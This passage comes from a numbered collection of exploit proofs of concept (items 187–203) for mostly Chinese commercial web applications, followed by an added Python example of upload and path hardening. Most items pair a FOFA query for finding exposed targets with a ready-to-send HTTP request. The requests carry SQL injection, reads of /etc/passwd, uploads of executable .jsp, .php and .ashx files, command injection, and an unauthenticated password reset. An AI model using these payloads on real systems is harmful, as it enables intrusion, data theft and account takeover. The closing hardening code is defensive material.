Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

(The stored file's extension comes from the name query parameter, so the body is written out as an .ashx handler and executed by ASP.NET.)

193. 山石网科 云鉴 host security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: request a CSRF token for a PHPSESSID of your choosing.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: submit the command with that token ({{token}}) and the same PHPSESSID. The POC writes a marker into the web-served img directory.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back to confirm execution.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the endpoint is present and the vulnerability is likely.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

(The filename is used unsanitised, so the ../ sequence walks out of the attachment directory into the deployed fe.war.)

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

(The sid parameter URL-decodes to `ls />/www/aaa.txt` followed by a space, i.e. backtick command substitution that writes the listing into the web root; the sysauth cookie stands for a valid LuCI session.)

199. Cockpit assetsmanager/upload authenticated file upload
Fofa:title="Authenticate Please!"
1. Fetch the CSRF token from the login page:
GET /auth/login?to=/ HTTP/1.1

Response: 200; the page body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that JWT (the POC uses admin/admin) to obtain the session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

4. The uploaded file is reachable at /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正 (FOUNDER) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Step 1: fetch the __VIEWSTATE and __EVENTVALIDATION values.
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: substitute those __VIEWSTATE and __EVENTVALIDATION values into the upload request.
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is reachable at /_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
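Added example (my code, not any vendor's) showing the server-side checks that the upload items 192, 194, 199, 202 and 203 are missing: the filename is client-controlled (Content-Disposition, or the ?name=.ashx query string of item 192), the declared Content-Type proves nothing (item 203 sends a .jsp as image/jpeg), and a name containing ../ must never reach the filesystem (item 194 writes into fe.war). The same containment check is the read-side fix for items 188 and 190 (file=/etc/passwd, poi=file:///etc/passwd). The upload root /srv/uploads, the extension policy, the magic-byte table and the function names are assumptions made for the example.

```python
"""Upload and download path hardening for the POC shapes above (added example, not vendor code)."""
import os
import secrets

ALLOWED_EXT = {".jpg", ".png", ".gif", ".pdf", ".txt", ".docx"}        # assumed site policy
EXECUTABLE_EXT = {".jsp", ".jspx", ".php", ".phtml", ".phar", ".ashx",   # never stored under a web root
                  ".asmx", ".aspx", ".cfm", ".cfc", ".cgi"}
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png",          # content sniffing; the
         b"GIF8": ".gif", b"%PDF": ".pdf"}                                # client Content-Type is ignored


class UploadRejected(ValueError):
    pass


def safe_basename(client_name):
    """Strip directory parts from a client filename and vet every suffix; returns the extension.

    Covers the POC shapes: '../../../../../jboss/web/fe.war/hello.jsp', '11.jsp' sent as
    image/jpeg, 'tttt.php', and the bare '.ashx' from UploadEmailAttr?name=.ashx.
    """
    name = client_name.replace("\\", "/").split("/")[-1].split("\x00")[0]
    if name in ("", ".", ".."):
        raise UploadRejected("empty or dot-only filename")
    parts = name.lower().split(".")
    # Every suffix counts, so 'shell.jsp.jpg' and 'x.php;.jpg' are caught, not only the last one.
    suffixes = {"." + p.strip(";") for p in parts[1:] if p.strip(";")}
    if suffixes & EXECUTABLE_EXT:
        raise UploadRejected("executable extension in %r" % name)
    ext = "." + parts[-1] if len(parts) > 1 else ""
    ext = ".jpg" if ext == ".jpeg" else ext
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension %r not allowed" % ext)
    return ext


def sniff_ext(data):
    """Extension implied by the leading bytes, or None when no accepted signature matches."""
    for sig, ext in MAGIC.items():
        if data.startswith(sig):
            return ext
    return None


def contained(root, path):
    """True when `path` resolves strictly inside `root` after symlinks and '..' are resolved."""
    root = os.path.realpath(root)
    path = os.path.realpath(path)
    return path != root and os.path.commonpath([root, path]) == root


def plan_upload(upload_root, client_name, data):
    """Destination for a validated upload: a random server-chosen name inside upload_root."""
    ext = safe_basename(client_name)
    if ext in MAGIC.values() and sniff_ext(data) != ext:
        raise UploadRejected("content does not match %s" % ext)
    dest = os.path.join(os.path.realpath(upload_root), secrets.token_hex(16) + ext)
    if not contained(upload_root, dest):
        raise UploadRejected("destination escapes upload root")
    return dest


def store_upload(upload_root, client_name, data):
    """Validate, then write; the client name is never part of the stored path."""
    dest = plan_upload(upload_root, client_name, data)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def resolve_download(upload_root, requested):
    """Read-side counterpart for /attachment?file=... and poi=file:///...: serve only inside root."""
    if "://" in requested or requested.startswith(("/", "\\")):
        raise UploadRejected("absolute paths and URL schemes are not accepted")
    dest = os.path.join(os.path.realpath(upload_root), requested.replace("\\", "/"))
    if not contained(upload_root, dest):
        raise UploadRejected("path escapes upload root")
    return os.path.realpath(dest)


def is_acceptable(client_name, data=b"", upload_root="/srv/uploads"):
    """Boolean view of plan_upload() for quick policy checks."""
    try:
        plan_upload(upload_root, client_name, data)
        return True
    except UploadRejected:
        return False


def is_servable(requested, upload_root="/srv/uploads"):
    """Boolean view of resolve_download()."""
    try:
        resolve_download(upload_root, requested)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    for name in ("../../../../../jboss/web/fe.war/hello.jsp", "11.jsp", "tttt.php", ".ashx", "1123.txt"):
        print("%-45s %s" % (name, "accepted" if is_acceptable(name, b"Hello World!") else "rejected"))
    for req in ("/etc/passwd", "file:///etc/passwd", "../../etc/passwd", "2024/report.pdf"):
        print("%-45s %s" % (req, "served" if is_servable(req) else "rejected"))
```

Two points matter beyond the checks themselves: URL-decode the parameter once before calling resolve_download() (the web framework normally does this, but a second encoded layer such as ..%252f must not reach it), and keep the upload root outside the web application's own tree, so that even a bypass of the extension policy does not land next to a servlet or handler mapping.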
